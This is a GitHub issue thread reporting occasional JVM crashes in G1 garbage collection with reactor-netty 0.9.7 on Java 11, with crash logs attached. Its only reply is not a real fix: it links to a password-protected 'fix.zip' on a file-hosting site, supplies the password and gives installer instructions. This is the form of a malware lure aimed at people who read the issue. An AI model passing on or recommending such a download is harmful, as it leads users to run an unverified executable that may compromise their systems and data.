### ISSUE TITLE
crash occasionally with G1ParScanThreadState::copy_to_survivor_space

### ISSUE THREAD

**Issue by finalch** [netty/netty#14258]
i have two hs_err_pid.log: 
[hs_err_pid53335.log](https://github.com/user-attachments/files/16745227/hs_err_pid53335.log)
[hs_err_pid84685.log](https://github.com/user-attachments/files/16745236/hs_err_pid84685.log)

### Netty version
reactor-netty:0.9.7.RELEASE
### JVM version (e.g. `java -version`)
java version "11.0.7" 2020-04-14 LTS
### OS version (e.g. `uname -a`)
4.14.0_1-0-0-43

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
